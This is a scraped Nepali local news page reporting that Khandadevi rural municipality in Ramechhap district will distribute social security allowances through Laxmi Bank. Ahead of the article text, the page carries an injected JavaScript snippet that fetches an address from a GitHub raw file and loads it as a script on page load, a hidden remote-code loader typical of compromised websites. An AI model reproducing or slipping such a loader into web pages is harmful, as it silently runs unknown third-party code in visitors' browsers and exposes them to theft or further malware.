;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); रामेछापको खाँडादेवीमा बैंकिङ प्रणालीबाट सामाजिक सुरक्षा भत्ता वितरण – जुनेली न्युज
मङ्लबार, असार ११, २०८२
  • होमपेज
  • रामेछापको खाँडादेवीमा बैंकिङ प्रणालीबाट सामाजिक सुरक्षा भत्ता वितरण
जुनेली बिशेष

रामेछापको खाँडादेवीमा बैंकिङ प्रणालीबाट सामाजिक सुरक्षा भत्ता वितरण

भदौ २१

रामेछाप । रामेछापको खाँडादेवी गाँउपालिकामा सामाजिक सुरक्षा भत्ता अबदेखि बैंककि प्रणालि मार्फत भूक्तानी हुने भएको छ । राष्ट्रिय परिचयपत्र तथा पञ्जीकरण विभागले सामाजिक सुरक्षा वितरणलाई पारदर्शी बनाउन बैंक पुगेका स्थानीय तहमा अनिवार्य बैंकिङ प्रणालीबाट भत्ता वितरण गर्ने निर्णय गरेसंगै पालिकामा भत्ता वितरणको काम बैंक मार्फत हुने पालिकाले आइतबार निर्णय गरेको हो ।

आइतबार भत्ता वितरणको लागि लक्ष्मी बैंक र गाउँपालिकाबीच सम्झौता भएको पालिका प्रमुख प्रेम बहादुर तामाङले जानकारी दिए । हाल गाउँपालिकामा ३ हजार २ सय ३१ जनाले सामाजिक सुरक्षा भत्ता बुझ्दै आएका छन् ।

यसअघि नै जिल्लाको सुनापति गाउँपालिका र दोरम्बा गाउँपालिकाले पनि सामाजिक सुरक्षा भत्ता बैकिङ प्रणालीबाट दिने निर्णय गरि सकेका छन् ।

फेसबुक प्रतिक्रियाहरु